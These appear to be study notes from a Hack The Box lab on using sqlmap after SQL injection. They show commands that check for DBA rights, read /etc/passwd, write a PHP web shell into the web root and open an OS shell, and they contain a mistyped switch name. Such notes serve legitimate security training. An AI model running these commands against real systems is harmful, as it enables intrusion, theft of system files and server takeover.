File Read

To read files, DB user must have the privilege to LOAD DATA and INSERT.

Most likely, we will need DBA to read data.

To check for DBA privilege, we use --is-dba switch:

jadu101@htb[/htb]$ sqlmap -u "" --is-dba
current user is DBA: True
[*] ending @ 17:31:56 /2020-11-19

We can read files using --file-read option:

jadu101@htb[/htb]$ sqlmap -u "" --file-read "/etc/passwd"

File Write

Most of the time, we won’t be able to write a file.

We need DBA’s to be able to write files.

We can write files as such:

jadu101@htb[/htb]$ sqlmap -u "" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

OS Command Execution

jadu101@htb[/htb]$ sqlmap -u "" --os-shell

If we know the type of SQL injection we can specify using --sepcify switch:

jadu101@htb[/htb]$ sqlmap -u "" --os-shell --technique=E